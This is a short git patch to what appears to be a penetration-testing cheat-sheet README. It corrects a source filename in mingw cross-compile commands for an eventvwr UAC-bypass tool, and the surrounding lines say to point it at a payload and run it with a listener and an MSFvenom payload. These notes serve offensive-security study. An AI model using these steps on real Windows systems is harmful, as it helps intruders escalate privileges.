From 783e2aa159980c6a8dbea23dbfd7a79d6975c1f4 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 5 Oct 2022 12:38:57 -0400 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e7b1b57..9689b96 100644 --- a/README.md +++ b/README.md @@ -949,8 +949,8 @@ Change binary in evenvwrbypass.c to payload strcat(curPath, "\run.exe"); Compile to .exe: 64 ot 32 bit -x86_64-w64-mingw32-gcc evenvwrbypass.c -o eventvwr-bypassuac-64.exe -i686-w64-mingw32-gcc evenvwrbypass.c -o eventvwr-bypassuac-32.exe +x86_64-w64-mingw32-gcc eventvwrbypass.c -o eventvwr-bypassuac-64.exe +i686-w64-mingw32-gcc eventvwrbypass.c -o eventvwr-bypassuac-32.exe # -static flag for library issues Run Executable with listener setup in same directory as MSFvenom payload